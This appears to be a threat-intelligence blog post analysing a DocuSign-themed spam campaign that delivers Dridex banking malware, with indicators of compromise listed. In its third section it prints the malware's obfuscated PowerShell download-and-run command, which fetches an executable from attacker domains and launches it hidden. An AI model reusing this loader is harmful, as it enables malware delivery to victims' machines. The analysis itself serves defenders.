Malware Spam Internals: Docusign Spam Leads Dridex Banking Malware Botnet ID “23005”

Goal: Reverse and document the latest Dridex banking malware campaign related to botnet ID “23005.”
Thanks to @James_inthe_box, I decided to quickly analyze and document the Dridex botnet ID “23005” spam infection chain leading from the spam campaign impersonating DocuSign. The observed subject of the Dridex campaign was “Please DocuSign the attached Business Activity Statements.”
Malware Spam Chain:
I. Spam Microsoft Word Macro Document 

II. CMD/PowerShell Execution & Download to %TMP%\jjkv.exe & %TMP%\gwzoxu.bat.
Payload domains: 

  • hxxps://meshbazaar[.]com/src/point[.]pdf
  • hxxp://myhomegt[.]com/src/point[.]pdf

The Dridex payloads were staged by the operators on March 29 14:12 GMT.

III. Batch Script Binary Execution

cmd /c PowerShell “‘PowerShell “”function MASWE([String] $senw){(New-Object System.Net.WebClient).DownloadFile($senw,”%TMP%\jjvkh.exe”);Start-Process ”%TMP%\jjvkh.exe”;} try{ MASWE(”hxxps://meshbazaar[.]com/src/point[.]pdf”)} catch{ MASWE(”hxxp://myhomegt[.]com/src/point[.]pdf”)}'”” | Out-File -encoding ASCII -FilePath %TMP%\gwzoxu[.]bat; Start-Process ‘%TMP%\gwzoxu.bat’ -WindowStyle Hidden”Botnet ID:
IV. The Dridex binary contains four hardcoded peers communicating  on the quite unusual port 3889. These ports normally associated with “D and V Tester Control Port.”

V. Addendum: Indicators of Compromise (IOCs):
Spam subject:
  • “Please DocuSign the attached Business Activity Statements”

Malicious Word loader (MD5):

  • 5E022694C0DBD1FBBC263D608E577949
Dridex payload download:
  • hxxp://myhomegt[.]com/src/point[.]pdf
  • hxxps://meshbazaar[.]com/src/point[.]pdf
First-layer peer block:

  • 46.105.131[.]88:443
  • 198.57.157[.]216:3889
  • 149.202.153[.]251:3889
  • 67.212.241[.]131:443

Dridex “23005” binary (MD5):

  • MD5: 88ce6c0affcdbdc82abe53957dddfa12

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: